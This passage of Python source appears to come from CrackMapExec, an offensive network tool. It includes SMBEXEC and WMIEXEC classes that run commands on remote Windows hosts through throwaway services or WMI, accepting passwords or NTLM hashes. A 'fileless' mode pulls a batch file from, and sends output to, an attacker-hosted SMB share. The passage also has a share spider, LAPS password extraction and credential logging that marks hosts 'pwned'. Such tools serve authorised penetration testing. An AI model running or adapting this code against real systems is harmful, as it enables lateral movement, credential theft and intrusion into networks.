from impacket.dcerpc.v5 import transport, scmr
from cme.helpers.misc import gen_random_string
from impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_GSS_NEGOTIATE
class SMBEXEC:
def __init__(
self,
host,
share_name,
smbconnection,
protocol,
username="",
password="",
domain="",
doKerberos=False,
aesKey=None,
kdcHost=None,
hashes=None,
share=None,
port=445,
logger=None,
tries=None
):
self.__host = host
self.__share_name = "C$"
self.__port = port
self.__username = username
self.__password = password
self.__serviceName = gen_random_string()
self.__domain = domain
self.__lmhash = ""
self.__nthash = ""
self.__share = share
self.__smbconnection = smbconnection
self.__output = None
self.__batchFile = None
self.__outputBuffer = b""
self.__shell = "%COMSPEC% /Q /c "
self.__retOutput = False
self.__rpctransport = None
self.__scmr = None
self.__conn = None
# self.__mode = mode
self.__aesKey = aesKey
self.__doKerberos = doKerberos
self.__kdcHost = kdcHost
self.__tries = tries
self.logger = logger
if hashes is not None:
# This checks to see if we didn't provide the LM Hash
if hashes.find(":") != -1:
self.__lmhash, self.__nthash = hashes.split(":")
else:
self.__nthash = hashes
if self.__password is None:
self.__password = ""
stringbinding = "ncacn_np:%s[\pipe\svcctl]" % self.__host
self.logger.debug("StringBinding %s" % stringbinding)
self.__rpctransport = transport.DCERPCTransportFactory(stringbinding)
self.__rpctransport.set_dport(self.__port)
if hasattr(self.__rpctransport, "setRemoteHost"):
self.__rpctransport.setRemoteHost(self.__host)
if hasattr(self.__rpctransport, "set_credentials"):
# This method exists only for selected protocol sequences.
self.__rpctransport.set_credentials(
self.__username,
self.__password,
self.__domain,
self.__lmhash,
self.__nthash,
self.__aesKey,
)
self.__rpctransport.set_kerberos(self.__doKerberos, self.__kdcHost)
self.__scmr = self.__rpctransport.get_dce_rpc()
if self.__doKerberos:
self.__scmr.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE)
self.__scmr.connect()
s = self.__rpctransport.get_smb_connection()
# We don't wanna deal with timeouts from now on.
s.setTimeout(100000)
self.__scmr.bind(scmr.MSRPC_UUID_SCMR)
resp = scmr.hROpenSCManagerW(self.__scmr)
self.__scHandle = resp["lpScHandle"]
def execute(self, command, output=False):
self.__retOutput = output
if os.path.isfile(command):
with open(command) as commands:
for c in commands:
self.execute_remote(c.strip())
else:
self.execute_remote(command)
self.finish()
return self.__outputBuffer
def output_callback(self, data):
self.__outputBuffer += data
def execute_remote(self, data):
self.__output = gen_random_string(6)
self.__batchFile = gen_random_string(6) + ".bat"
if self.__retOutput:
command = self.__shell + "echo " + data + f" ^> \\\\127.0.0.1\\{self.__share_name}\\{self.__output} 2^>^&1 > %TEMP%\{self.__batchFile} & %COMSPEC% /Q /c %TEMP%\{self.__batchFile} & %COMSPEC% /Q /c del %TEMP%\{self.__batchFile}"
else:
command = self.__shell + data
with open(path_join("/tmp", "cme_hosted", self.__batchFile), "w") as batch_file:
batch_file.write(command)
self.logger.debug("Hosting batch file with command: " + command)
# command = self.__shell + '\\\\{}\\{}\\{}'.format(local_ip,self.__share_name, self.__batchFile)
self.logger.debug("Command to execute: " + command)
self.logger.debug(f"Remote service {self.__serviceName} created.")
try:
resp = scmr.hRCreateServiceW(
self.__scmr,
self.__scHandle,
self.__serviceName,
self.__serviceName,
lpBinaryPathName=command,
dwStartType=scmr.SERVICE_DEMAND_START,
)
service = resp["lpServiceHandle"]
except Exception as e:
if "rpc_s_access_denied" in str(e):
self.logger.fail("SMBEXEC: Create services got blocked.")
else:
self.logger.fail(str(e))
return self.__outputBuffer
try:
self.logger.debug(f"Remote service {self.__serviceName} started.")
scmr.hRStartServiceW(self.__scmr, service)
self.logger.debug(f"Remote service {self.__serviceName} deleted.")
scmr.hRDeleteService(self.__scmr, service)
scmr.hRCloseServiceHandle(self.__scmr, service)
except Exception as e:
pass
self.get_output_remote()
def get_output_remote(self):
if self.__retOutput is False:
self.__outputBuffer = ""
return
tries = 1
while True:
try:
self.logger.info(f"Attempting to read {self.__share}\\{self.__output}")
self.__smbconnection.getFile(self.__share, self.__output, self.output_callback)
break
except Exception as e:
if tries >= self.__tries:
self.logger.fail(f'SMBEXEC: Get output file error, maybe got detected by AV software, please increase the number of tries with the option "--get-output-tries". If it\'s still failing maybe something is blocking the schedule job, try another exec method')
break
if str(e).find("STATUS_BAD_NETWORK_NAME") >0 :
self.logger.fail(f'SMBEXEC: Get ouput failed, target has blocked {self.__share} access (maybe command executed!)')
break
if str(e).find("STATUS_SHARING_VIOLATION") >= 0 or str(e).find("STATUS_OBJECT_NAME_NOT_FOUND") >= 0:
# Output not finished, let's wait
sleep(2)
tries += 1
else:
self.logger.debug(str(e))
if self.__outputBuffer:
self.logger.debug(f"Deleting file {self.__share}\\{self.__output}")
self.__smbconnection.deleteFile(self.__share, self.__output)
def execute_fileless(self, data):
self.__output = gen_random_string(6)
self.__batchFile = gen_random_string(6) + ".bat"
local_ip = self.__rpctransport.get_socket().getsockname()[0]
if self.__retOutput:
command = self.__shell + data + f" ^> \\\\{local_ip}\\{self.__share_name}\\{self.__output}"
else:
command = self.__shell + data
with open(path_join("/tmp", "cme_hosted", self.__batchFile), "w") as batch_file:
batch_file.write(command)
self.logger.debug("Hosting batch file with command: " + command)
command = self.__shell + f"\\\\{local_ip}\\{self.__share_name}\\{self.__batchFile}"
self.logger.debug("Command to execute: " + command)
self.logger.debug(f"Remote service {self.__serviceName} created.")
resp = scmr.hRCreateServiceW(
self.__scmr,
self.__scHandle,
self.__serviceName,
self.__serviceName,
lpBinaryPathName=command,
dwStartType=scmr.SERVICE_DEMAND_START,
)
service = resp["lpServiceHandle"]
try:
self.logger.debug(f"Remote service {self.__serviceName} started.")
scmr.hRStartServiceW(self.__scmr, service)
except:
pass
self.logger.debug(f"Remote service {self.__serviceName} deleted.")
scmr.hRDeleteService(self.__scmr, service)
scmr.hRCloseServiceHandle(self.__scmr, service)
self.get_output_fileless()
def get_output_fileless(self):
if not self.__retOutput:
return
while True:
try:
with open(path_join("/tmp", "cme_hosted", self.__output), "rb") as output:
self.output_callback(output.read())
break
except IOError:
sleep(2)
def finish(self):
# Just in case the service is still created
try:
self.__scmr = self.__rpctransport.get_dce_rpc()
self.__scmr.connect()
self.__scmr.bind(scmr.MSRPC_UUID_SCMR)
resp = scmr.hROpenSCManagerW(self.__scmr)
self.__scHandle = resp["lpScHandle"]
resp = scmr.hROpenServiceW(self.__scmr, self.__scHandle, self.__serviceName)
service = resp["lpServiceHandle"]
scmr.hRDeleteService(self.__scmr, service)
scmr.hRControlService(self.__scmr, service, scmr.SERVICE_CONTROL_STOP)
scmr.hRCloseServiceHandle(self.__scmr, service)
except:
pass
================================================
FILE: cme/protocols/smb/smbspider.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from time import strftime, localtime
from cme.protocols.smb.remotefile import RemoteFile
from impacket.smb3structs import FILE_READ_DATA
from impacket.smbconnection import SessionError
import re
import traceback
class SMBSpider:
def __init__(self, smbconnection, logger):
self.smbconnection = smbconnection
self.logger = logger
self.share = None
self.regex = []
self.pattern = []
self.folder = None
self.exclude_dirs = []
self.onlyfiles = True
self.content = False
self.results = []
def spider(
self,
share,
folder=".",
pattern=[],
regex=[],
exclude_dirs=[],
depth=None,
content=False,
onlyfiles=True,
):
if regex:
try:
self.regex = [re.compile(bytes(rx, "utf8")) for rx in regex]
except Exception as e:
self.logger.fail(f"Regex compilation error: {e}")
self.folder = folder
self.pattern = pattern
self.exclude_dirs = exclude_dirs
self.content = content
self.onlyfiles = onlyfiles
if share == "*":
self.logger.display("Enumerating shares for spidering")
permissions = []
try:
for share in self.smbconnection.listShares():
share_name = share["shi1_netname"][:-1]
share_remark = share["shi1_remark"][:-1]
try:
self.smbconnection.listPath(share_name, "*")
self.share = share_name
self.logger.display(f"Spidering share: {share_name}")
self._spider(folder, depth)
except SessionError:
pass
except Exception as e:
self.logger.fail(f"Error enumerating shares: {e}")
else:
self.share = share
self.logger.display(f"Spidering {folder}")
self._spider(folder, depth)
return self.results
def _spider(self, subfolder, depth):
"""
Abandon all hope ye who enter here.
You're now probably wondering if I was drunk and/or high when writing this.
Getting this to work took a toll on my sanity. So yes. a lot.
"""
# The following is some funky shit that deals with the way impacket treats file paths
if subfolder in ["", "."]:
subfolder = "*"
elif subfolder.startswith("*/"):
subfolder = subfolder[2:] + "/*"
else:
subfolder = subfolder.replace("/*/", "/") + "/*"
# End of the funky shit... or is it? Surprise! This whole thing is funky
filelist = None
try:
filelist = self.smbconnection.listPath(self.share, subfolder)
self.dir_list(filelist, subfolder)
if depth == 0:
return
except SessionError as e:
if not filelist:
if "STATUS_ACCESS_DENIED" not in str(e):
self.logger.debug(f"Failed listing files on share {self.share} in directory {subfolder}: {e}")
return
for result in filelist:
if result.is_directory() and result.get_longname() not in [".", ".."]:
if subfolder == "*":
self._spider(
subfolder.replace("*", "") + result.get_longname(),
depth - 1 if depth else None,
)
elif subfolder != "*" and (subfolder[:-2].split("/")[-1] not in self.exclude_dirs):
self._spider(
subfolder.replace("*", "") + result.get_longname(),
depth - 1 if depth else None,
)
return
def dir_list(self, files, path):
path = path.replace("*", "")
for result in files:
if self.pattern:
for pattern in self.pattern:
if bytes(result.get_longname().lower(), "utf8").find(bytes(pattern.lower(), "utf8")) != -1:
if not self.onlyfiles and result.is_directory():
self.logger.highlight(f"//{self.smbconnection.getRemoteHost()}/{self.share}/{path}{result.get_longname()} [dir]")
else:
self.logger.highlight(
"//{}/{}/{}{} [lastm:'{}' size:{}]".format(
self.smbconnection.getRemoteHost(),
self.share,
path,
result.get_longname(),
"n\\a" if not self.get_lastm_time(result) else self.get_lastm_time(result),
result.get_filesize(),
)
)
self.results.append(f"{path}{result.get_longname()}")
if self.regex:
for regex in self.regex:
if regex.findall(bytes(result.get_longname(), "utf8")):
if not self.onlyfiles and result.is_directory():
self.logger.highlight(f"//{self.smbconnection.getRemoteHost()}/{self.share}/{path}{result.get_longname()} [dir]")
else:
self.logger.highlight(
"//{}/{}/{}{} [lastm:'{}' size:{}]".format(
self.smbconnection.getRemoteHost(),
self.share,
path,
result.get_longname(),
"n\\a" if not self.get_lastm_time(result) else self.get_lastm_time(result),
result.get_filesize(),
)
)
self.results.append(f"{path}{result.get_longname()}")
if self.content:
if not result.is_directory():
self.search_content(path, result)
return
def search_content(self, path, result):
path = path.replace("*", "")
try:
rfile = RemoteFile(
self.smbconnection,
path + result.get_longname(),
self.share,
access=FILE_READ_DATA,
)
rfile.open()
while True:
try:
contents = rfile.read(4096)
if not contents:
break
except SessionError as e:
if "STATUS_END_OF_FILE" in str(e):
break
except Exception:
traceback.print_exc()
break
if self.pattern:
for pattern in self.pattern:
if contents.lower().find(bytes(pattern.lower(), "utf8")) != -1:
self.logger.highlight(
"//{}/{}/{}{} [lastm:'{}' size:{} offset:{} pattern:'{}']".format(
self.smbconnection.getRemoteHost(),
self.share,
path,
result.get_longname(),
"n\\a" if not self.get_lastm_time(result) else self.get_lastm_time(result),
result.get_filesize(),
rfile.tell(),
pattern,
)
)
self.results.append(f"{path}{result.get_longname()}")
if self.regex:
for regex in self.regex:
if regex.findall(contents):
self.logger.highlight(
"//{}/{}/{}{} [lastm:'{}' size:{} offset:{} regex:'{}']".format(
self.smbconnection.getRemoteHost(),
self.share,
path,
result.get_longname(),
"n\\a" if not self.get_lastm_time(result) else self.get_lastm_time(result),
result.get_filesize(),
rfile.tell(),
regex.pattern,
)
)
self.results.append(f"{path}{result.get_longname()}")
rfile.close()
return
except SessionError as e:
if "STATUS_SHARING_VIOLATION" in str(e):
pass
except Exception:
traceback.print_exc()
def get_lastm_time(self, result_obj):
lastm_time = None
try:
lastm_time = strftime("%Y-%m-%d %H:%M", localtime(result_obj.get_mtime_epoch()))
except Exception:
pass
return lastm_time
================================================
FILE: cme/protocols/smb/wmiexec.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import ntpath
import os
from time import sleep
from cme.connection import dcom_FirewallChecker
from cme.helpers.misc import gen_random_string
from impacket.dcerpc.v5 import transport
from impacket.dcerpc.v5.dcomrt import DCOMConnection
from impacket.dcerpc.v5.dcom import wmi
from impacket.dcerpc.v5.dtypes import NULL
class WMIEXEC:
def __init__(
self,
target,
share_name,
username,
password,
domain,
smbconnection,
doKerberos=False,
aesKey=None,
kdcHost=None,
hashes=None,
share=None,
logger=None,
timeout=None,
tries=None
):
self.__target = target
self.__username = username
self.__password = password
self.__domain = domain
self.__lmhash = ""
self.__nthash = ""
self.__share = share
self.__timeout = timeout
self.__smbconnection = smbconnection
self.__output = None
self.__outputBuffer = b""
self.__share_name = share_name
self.__shell = "cmd.exe /Q /c "
self.__pwd = "C:\\"
self.__aesKey = aesKey
self.__kdcHost = kdcHost
self.__doKerberos = doKerberos
self.__retOutput = True
self.__stringBinding = ""
self.__tries = tries
self.logger = logger
if hashes is not None:
# This checks to see if we didn't provide the LM Hash
if hashes.find(":") != -1:
self.__lmhash, self.__nthash = hashes.split(":")
else:
self.__nthash = hashes
if self.__password is None:
self.__password = ""
self.__dcom = DCOMConnection(
self.__target,
self.__username,
self.__password,
self.__domain,
self.__lmhash,
self.__nthash,
self.__aesKey,
oxidResolver=True,
doKerberos=self.__doKerberos,
kdcHost=self.__kdcHost,
)
iInterface = self.__dcom.CoCreateInstanceEx(wmi.CLSID_WbemLevel1Login, wmi.IID_IWbemLevel1Login)
flag, self.__stringBinding = dcom_FirewallChecker(iInterface, self.__timeout)
if not flag or not self.__stringBinding:
error_msg = f'WMIEXEC: Dcom initialization failed on connection with stringbinding: "{self.__stringBinding}", please increase the timeout with the option "--dcom-timeout". If it\'s still failing maybe something is blocking the RPC connection, try another exec method'
if not self.__stringBinding:
error_msg = "WMIEXEC: Dcom initialization failed: can't get target stringbinding, maybe cause by IPv6 or any other issues, please check your target again"
self.logger.fail(error_msg) if not flag else self.logger.debug(error_msg)
# Make it force break function
self.__dcom.disconnect()
iWbemLevel1Login = wmi.IWbemLevel1Login(iInterface)
iWbemServices = iWbemLevel1Login.NTLMLogin("//./root/cimv2", NULL, NULL)
iWbemLevel1Login.RemRelease()
self.__win32Process, _ = iWbemServices.GetObject("Win32_Process")
def execute(self, command, output=False):
self.__retOutput = output
if self.__retOutput:
self.__smbconnection.setTimeout(100000)
if os.path.isfile(command):
with open(command) as commands:
for c in commands:
self.execute_handler(c.strip())
else:
self.execute_handler(command)
self.__dcom.disconnect()
return self.__outputBuffer
def cd(self, s):
self.execute_remote("cd " + s)
if len(self.__outputBuffer.strip("\r\n")) > 0:
self.__outputBuffer = b""
else:
self.__pwd = ntpath.normpath(ntpath.join(self.__pwd, s))
self.execute_remote("cd ")
self.__pwd = self.__outputBuffer.strip("\r\n")
self.__outputBuffer = b""
def output_callback(self, data):
self.__outputBuffer += data
def execute_handler(self, data):
try:
self.logger.debug("Executing remote")
self.execute_remote(data)
except:
self.cd("\\")
self.execute_remote(data)
def execute_remote(self, data):
self.__output = "\\Windows\\Temp\\" + gen_random_string(6)
command = self.__shell + data
if self.__retOutput:
command += " 1> " + f"{self.__output}" + " 2>&1"
self.logger.debug("Executing command: " + command)
self.__win32Process.Create(command, self.__pwd, None)
self.get_output_remote()
def execute_fileless(self, data):
self.__output = gen_random_string(6)
local_ip = self.__smbconnection.getSMBServer().get_socket().getsockname()[0]
command = self.__shell + data + f" 1> \\\\{local_ip}\\{self.__share_name}\\{self.__output} 2>&1"
self.logger.debug("Executing command: " + command)
self.__win32Process.Create(command, self.__pwd, None)
self.get_output_fileless()
def get_output_fileless(self):
while True:
try:
with open(os.path.join("/tmp", "cme_hosted", self.__output), "r") as output:
self.output_callback(output.read())
break
except IOError:
sleep(2)
def get_output_remote(self):
if self.__retOutput is False:
self.__outputBuffer = ""
return
tries = 1
while True:
try:
self.logger.info(f"Attempting to read {self.__share}\\{self.__output}")
self.__smbconnection.getFile(self.__share, self.__output, self.output_callback)
break
except Exception as e:
if tries >= self.__tries:
self.logger.fail(f'WMIEXEC: Get output file error, maybe got detected by AV software, please increase the number of tries with the option "--get-output-tries". If it\'s still failing maybe something is blocking the schedule job, try another exec method')
break
if str(e).find("STATUS_BAD_NETWORK_NAME") >0 :
self.logger.fail(f'SMB connection: target has blocked {self.__share} access (maybe command executed!)')
break
if str(e).find("STATUS_SHARING_VIOLATION") >= 0 or str(e).find("STATUS_OBJECT_NAME_NOT_FOUND") >= 0:
sleep(2)
tries += 1
pass
else:
self.logger.debug(str(e))
if self.__outputBuffer:
self.logger.debug(f"Deleting file {self.__share}\\{self.__output}")
self.__smbconnection.deleteFile(self.__share, self.__output)
================================================
FILE: cme/protocols/smb.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import ntpath
import hashlib
import binascii
from io import StringIO
from Cryptodome.Hash import MD4
from impacket.smbconnection import SMBConnection, SessionError
from impacket.smb import SMB_DIALECT
from impacket.examples.secretsdump import (
RemoteOperations,
SAMHashes,
LSASecrets,
NTDSHashes,
)
from impacket.nmb import NetBIOSError, NetBIOSTimeout
from impacket.dcerpc.v5 import transport, lsat, lsad, scmr
from impacket.dcerpc.v5.rpcrt import DCERPCException
from impacket.dcerpc.v5.transport import DCERPCTransportFactory, SMBTransport
from impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_GSS_NEGOTIATE
from impacket.dcerpc.v5.epm import MSRPC_UUID_PORTMAP
from impacket.dcerpc.v5.samr import SID_NAME_USE
from impacket.dcerpc.v5.dtypes import MAXIMUM_ALLOWED
from impacket.krb5.kerberosv5 import SessionKeyDecryptionError
from impacket.krb5.types import KerberosException
from impacket.dcerpc.v5.dtypes import NULL
from impacket.dcerpc.v5.dcomrt import DCOMConnection
from impacket.dcerpc.v5.dcom.wmi import CLSID_WbemLevel1Login, IID_IWbemLevel1Login, WBEM_FLAG_FORWARD_ONLY, IWbemLevel1Login
from cme.config import process_secret, host_info_colors
from cme.connection import *
from cme.logger import CMEAdapter
from cme.protocols.smb.firefox import FirefoxTriage
from cme.servers.smb import CMESMBServer
from cme.protocols.smb.wmiexec import WMIEXEC
from cme.protocols.smb.atexec import TSCH_EXEC
from cme.protocols.smb.smbexec import SMBEXEC
from cme.protocols.smb.mmcexec import MMCEXEC
from cme.protocols.smb.smbspider import SMBSpider
from cme.protocols.smb.passpol import PassPolDump
from cme.protocols.smb.samruser import UserSamrDump
from cme.protocols.smb.samrfunc import SamrFunc
from cme.protocols.ldap.laps import LDAPConnect, LAPSv2Extract
from cme.protocols.ldap.gmsa import MSDS_MANAGEDPASSWORD_BLOB
from cme.helpers.logger import highlight
from cme.helpers.misc import *
from cme.helpers.bloodhound import add_user_bh
from cme.helpers.powershell import create_ps_command
from dploot.triage.vaults import VaultsTriage
from dploot.triage.browser import BrowserTriage
from dploot.triage.credentials import CredentialsTriage
from dploot.triage.masterkeys import MasterkeysTriage, parse_masterkey_file
from dploot.triage.backupkey import BackupkeyTriage
from dploot.lib.target import Target
from dploot.lib.smb import DPLootSMBConnection
from pywerview.cli.helpers import *
from time import time
from datetime import datetime
from functools import wraps
from traceback import format_exc
import logging
from json import loads
from termcolor import colored
smb_share_name = gen_random_string(5).upper()
smb_server = None
smb_error_status = [
"STATUS_ACCOUNT_DISABLED",
"STATUS_ACCOUNT_EXPIRED",
"STATUS_ACCOUNT_RESTRICTION",
"STATUS_INVALID_LOGON_HOURS",
"STATUS_INVALID_WORKSTATION",
"STATUS_LOGON_TYPE_NOT_GRANTED",
"STATUS_PASSWORD_EXPIRED",
"STATUS_PASSWORD_MUST_CHANGE",
"STATUS_ACCESS_DENIED",
"STATUS_NO_SUCH_FILE",
"KDC_ERR_CLIENT_REVOKED",
"KDC_ERR_PREAUTH_FAILED",
]
def get_error_string(exception):
if hasattr(exception, "getErrorString"):
try:
es = exception.getErrorString()
except KeyError:
return f"Could not get nt error code {exception.getErrorCode()} from impacket: {exception}"
if type(es) is tuple:
return es[0]
else:
return es
else:
return str(exception)
def requires_smb_server(func):
def _decorator(self, *args, **kwargs):
global smb_server
global smb_share_name
get_output = False
payload = None
methods = []
try:
payload = args[0]
except IndexError:
pass
try:
get_output = args[1]
except IndexError:
pass
try:
methods = args[2]
except IndexError:
pass
if "payload" in kwargs:
payload = kwargs["payload"]
if "get_output" in kwargs:
get_output = kwargs["get_output"]
if "methods" in kwargs:
methods = kwargs["methods"]
if not payload and self.args.execute:
if not self.args.no_output:
get_output = True
if get_output or (methods and ("smbexec" in methods)):
if not smb_server:
self.logger.debug("Starting SMB server")
smb_server = CMESMBServer(
self.cme_logger,
smb_share_name,
listen_port=self.args.smb_server_port,
verbose=self.args.verbose,
)
smb_server.start()
output = func(self, *args, **kwargs)
if smb_server is not None:
smb_server.shutdown()
smb_server = None
return output
return wraps(func)(_decorator)
class smb(connection):
def __init__(self, args, db, host):
self.domain = None
self.server_os = None
self.os_arch = 0
self.hash = None
self.lmhash = ""
self.nthash = ""
self.remote_ops = None
self.bootkey = None
self.output_filename = None
self.smbv1 = None
self.signing = False
self.smb_share_name = smb_share_name
self.pvkbytes = None
self.no_da = None
self.no_ntlm = False
self.protocol = "SMB"
connection.__init__(self, args, db, host)
def proto_logger(self):
self.logger = CMEAdapter(
extra={
"protocol": "SMB",
"host": self.host,
"port": self.args.port,
"hostname": self.hostname,
}
)
def get_os_arch(self):
try:
string_binding = rf"ncacn_ip_tcp:{self.host}[135]"
transport = DCERPCTransportFactory(string_binding)
transport.set_connect_timeout(5)
dce = transport.get_dce_rpc()
if self.kerberos:
dce.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE)
dce.connect()
try:
dce.bind(
MSRPC_UUID_PORTMAP,
transfer_syntax=("71710533-BEBA-4937-8319-B5DBEF9CCC36", "1.0"),
)
except DCERPCException as e:
if str(e).find("syntaxes_not_supported") >= 0:
dce.disconnect()
return 32
else:
dce.disconnect()
return 64
except Exception as e:
self.logger.debug(f"Error retrieving os arch of {self.host}: {str(e)}")
return 0
def enum_host_info(self):
self.local_ip = self.conn.getSMBServer().get_socket().getsockname()[0]
try:
self.conn.login("", "")
except BrokenPipeError:
self.logger.fail(f"Broken Pipe Error while attempting to login")
except Exception as e:
if "STATUS_NOT_SUPPORTED" in str(e):
# no ntlm supported
self.no_ntlm = True
pass
self.domain = self.conn.getServerDNSDomainName() if not self.no_ntlm else self.args.domain
self.hostname = self.conn.getServerName() if not self.no_ntlm else self.host
self.server_os = self.conn.getServerOS()
self.logger.extra["hostname"] = self.hostname
if isinstance(self.server_os.lower(), bytes):
self.server_os = self.server_os.decode("utf-8")
try:
self.signing = self.conn.isSigningRequired() if self.smbv1 else self.conn._SMBConnection._Connection["RequireSigning"]
except Exception as e:
self.logger.debug(e)
pass
self.os_arch = self.get_os_arch()
self.output_filename = os.path.expanduser(f"~/.cme/logs/{self.hostname}_{self.host}_{datetime.now().strftime('%Y-%m-%d_%H%M%S')}".replace(":", "-"))
if not self.domain:
self.domain = self.hostname
self.db.add_host(
self.host,
self.hostname,
self.domain,
self.server_os,
self.smbv1,
self.signing,
)
try:
# DCs seem to want us to logoff first, windows workstations sometimes reset the connection
self.conn.logoff()
except Exception as e:
self.logger.debug(f"Error logging off system: {e}")
pass
if self.args.domain:
self.domain = self.args.domain
if self.args.local_auth:
self.domain = self.hostname
def laps_search(self, username, password, ntlm_hash, domain):
self.logger.extra["protocol"] = "LDAP"
self.logger.extra["port"] = "389"
ldapco = LDAPConnect(self.domain, "389", self.domain)
if self.kerberos:
if self.kdcHost is None:
self.logger.fail("Add --kdcHost parameter to use laps with kerberos")
return False
connection = ldapco.kerberos_login(
domain,
username[0] if username else "",
password[0] if password else "",
ntlm_hash[0] if ntlm_hash else "",
kdcHost=self.kdcHost,
aesKey=self.aesKey,
)
else:
connection = ldapco.auth_login(
domain,
username[0] if username else "",
password[0] if password else "",
ntlm_hash[0] if ntlm_hash else "",
)
if not connection:
self.logger.fail(f"LDAP connection failed with account {username[0]}")
return False
search_filter = "(&(objectCategory=computer)(|(msLAPS-EncryptedPassword=*)(ms-MCS-AdmPwd=*)(msLAPS-Password=*))(name=" + self.hostname + "))"
attributes = [
"msLAPS-EncryptedPassword",
"msLAPS-Password",
"ms-MCS-AdmPwd",
"sAMAccountName",
]
results = connection.search(searchFilter=search_filter, attributes=attributes, sizeLimit=0)
msMCSAdmPwd = ""
sAMAccountName = ""
username_laps = ""
from impacket.ldap import ldapasn1 as ldapasn1_impacket
results = [r for r in results if isinstance(r, ldapasn1_impacket.SearchResultEntry)]
if len(results) != 0:
for host in results:
values = {str(attr["type"]).lower(): attr["vals"][0] for attr in host["attributes"]}
if "mslaps-encryptedpassword" in values:
msMCSAdmPwd = values["mslaps-encryptedpassword"]
d = LAPSv2Extract(
bytes(msMCSAdmPwd),
username[0] if username else "",
password[0] if password else "",
domain,
ntlm_hash[0] if ntlm_hash else "",
self.args.kerberos,
self.args.kdcHost,
339)
try:
data = d.run()
except Exception as e:
self.logger.fail(str(e))
return
r = loads(data)
msMCSAdmPwd = r["p"]
username_laps = r["n"]
elif "mslaps-password" in values:
r = loads(str(values["mslaps-password"]))
msMCSAdmPwd = r["p"]
username_laps = r["n"]
elif "ms-mcs-admpwd" in values:
msMCSAdmPwd = str(values["ms-mcs-admpwd"])
else:
self.logger.fail("No result found with attribute ms-MCS-AdmPwd or msLAPS-Password")
logging.debug(f"Host: {sAMAccountName:<20} Password: {msMCSAdmPwd} {self.hostname}")
else:
self.logger.fail(f"msMCSAdmPwd or msLAPS-Password is empty or account cannot read LAPS property for {self.hostname}")
return False
self.username = self.args.laps if not username_laps else username_laps
self.password = msMCSAdmPwd
if msMCSAdmPwd == "":
self.logger.fail(f"msMCSAdmPwd or msLAPS-Password is empty or account cannot read LAPS property for {self.hostname}")
return False
if ntlm_hash:
hash_ntlm = hashlib.new("md4", msMCSAdmPwd.encode("utf-16le")).digest()
self.hash = binascii.hexlify(hash_ntlm).decode()
self.domain = self.hostname
self.logger.extra["protocol"] = "SMB"
self.logger.extra["port"] = "445"
return True
def print_host_info(self):
signing = colored(f"signing:{self.signing}", host_info_colors[0], attrs=['bold']) if self.signing else colored(f"signing:{self.signing}", host_info_colors[1], attrs=['bold'])
smbv1 = colored(f"SMBv1:{self.smbv1}", host_info_colors[2], attrs=['bold']) if self.smbv1 else colored(f"SMBv1:{self.smbv1}", host_info_colors[3], attrs=['bold'])
self.logger.display(f"{self.server_os}{f' x{self.os_arch}' if self.os_arch else ''} (name:{self.hostname}) (domain:{self.domain}) ({signing}) ({smbv1})")
if self.args.laps:
return self.laps_search(self.args.username, self.args.password, self.args.hash, self.domain)
return True
def kerberos_login(self, domain, username, password="", ntlm_hash="", aesKey="", kdcHost="", useCache=False):
logging.getLogger("impacket").disabled = True
# Re-connect since we logged off
if not self.no_ntlm:
fqdn_host = f"{self.hostname}.{self.domain}"
else:
fqdn_host = f"{self.host}"
self.create_conn_obj(fqdn_host)
lmhash = ""
nthash = ""
try:
if not self.args.laps:
self.password = password
self.username = username
# This checks to see if we didn't provide the LM Hash
if ntlm_hash.find(":") != -1:
lmhash, nthash = ntlm_hash.split(":")
self.hash = nthash
else:
nthash = ntlm_hash
self.hash = ntlm_hash
if lmhash:
self.lmhash = lmhash
if nthash:
self.nthash = nthash
if not all("" == s for s in [self.nthash, password, aesKey]):
kerb_pass = next(s for s in [self.nthash, password, aesKey] if s)
else:
kerb_pass = ""
self.logger.debug(f"Attempting to do Kerberos Login with useCache: {useCache}")
self.conn.kerberosLogin( username, password, domain, lmhash, nthash, aesKey, kdcHost, useCache=useCache)
self.check_if_admin()
if username == "":
self.username = self.conn.getCredentials()[0]
else:
self.username = username
used_ccache = " from ccache" if useCache else f":{process_secret(kerb_pass)}"
else:
self.plaintext_login(self.hostname, username, password)
return True
out = f"{self.domain}\\{self.username}{used_ccache} {self.mark_pwned()}"
self.logger.success(out)
if not self.args.local_auth:
add_user_bh(self.username, domain, self.logger, self.config)
# check https://github.com/byt3bl33d3r/CrackMapExec/issues/321
if self.args.continue_on_success and self.signing:
try:
self.conn.logoff()
except:
pass
self.create_conn_obj()
return True
except SessionKeyDecryptionError:
# success for now, since it's a vulnerability - previously was an error
self.logger.success(
f"{domain}\\{self.username} account vulnerable to asreproast attack",
color="yellow",
)
return False
except (FileNotFoundError, KerberosException) as e:
self.logger.fail(f"CCache Error: {e}")
return False
except OSError as e:
used_ccache = " from ccache" if useCache else f":{process_secret(kerb_pass)}"
self.logger.fail(f"{domain}\\{self.username}{used_ccache} {e}")
except (SessionError, Exception) as e:
error, desc = e.getErrorString()
used_ccache = " from ccache" if useCache else f":{process_secret(kerb_pass)}"
self.logger.fail(
f"{domain}\\{self.username}{used_ccache} {error} {f'({desc})' if self.args.verbose else ''}",
color="magenta" if error in smb_error_status else "red",
)
if error not in smb_error_status:
self.inc_failed_login(username)
return False
return False
def plaintext_login(self, domain, username, password):
# Re-connect since we logged off
self.create_conn_obj()
try:
if not self.args.laps:
self.password = password
self.username = username
self.domain = domain
self.conn.login(self.username, self.password, domain)
self.check_if_admin()
self.logger.debug(f"Adding credential: {domain}/{self.username}:{self.password}")
self.db.add_credential("plaintext", domain, self.username, self.password)
user_id = self.db.get_credential("plaintext", domain, self.username, self.password)
host_id = self.db.get_hosts(self.host)[0].id
self.db.add_loggedin_relation(user_id, host_id)
if self.admin_privs:
self.logger.debug(f"Adding admin user: {self.domain}/{self.username}:{self.password}@{self.host}")
self.db.add_admin_user(
"plaintext",
domain,
self.username,
self.password,
self.host,
user_id=user_id,
)
out = f"{domain}\\{self.username}:{process_secret(self.password)} {self.mark_pwned()}"
self.logger.success(out)
if not self.args.local_auth:
add_user_bh(self.username, self.domain, self.logger, self.config)
# check https://github.com/byt3bl33d3r/CrackMapExec/issues/321
if self.args.continue_on_success and self.signing:
try:
self.conn.logoff()
except:
pass
self.create_conn_obj()
return True
